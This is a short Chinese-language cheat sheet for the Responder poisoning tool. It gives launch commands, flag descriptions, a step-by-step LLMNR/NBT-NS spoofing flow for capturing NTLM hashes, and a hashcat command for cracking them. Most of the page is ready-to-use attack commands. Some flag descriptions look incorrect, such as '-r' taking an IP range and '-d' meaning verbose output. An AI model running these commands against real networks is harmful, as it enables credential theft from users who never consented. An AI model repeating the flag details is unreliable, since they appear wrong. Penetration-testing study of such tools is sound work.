Responder

Responder

Responder 是一款 LLMNR/NBT-NS/mDNS-NS 投毒工具,用于监听并响应本地名称解析请求。

基础使用

启动 Responder

responder -I eth0 -w -r -d -F

仅监听模式

responder -I eth0 -A

详细模式

responder -I eth0 -v

指定 IP 范围

responder -I eth0 -r 192.168.1.1-254

常用参数

参数 描述
-I 网络接口
-A 分析模式(仅监听)
-w 启动 WPAD 代理
-r 响应服务名称查询
-d 启用详细输出
-F 强制响应
-v 详细模式

功能特性

  • LLMNR 投毒 - 监听本地名称解析
  • NBT-NS 投毒 - NetBIOS 名称投毒
  • WPAD 代理 - 自动代理发现
  • 凭证捕获 - 捕获 NTLM 哈希
  • 文件服务器 - 模拟 SMB 服务器

攻击流程

  1. 启动 Responder 监听
  2. 等待目标发起名称解析
  3. Responder 响应并欺骗目标
  4. 目标发送认证请求
  5. 捕获 NTLM 哈希

使用示例

# 基本监听
responder -I eth0

# 分析模式(被动)
responder -I eth0 -A

# 完整攻击模式
responder -I eth0 -w -r -d

# 捕获凭证后破解
hashcat -m 5600 captured_hashes.txt wordlist.txt

参考资源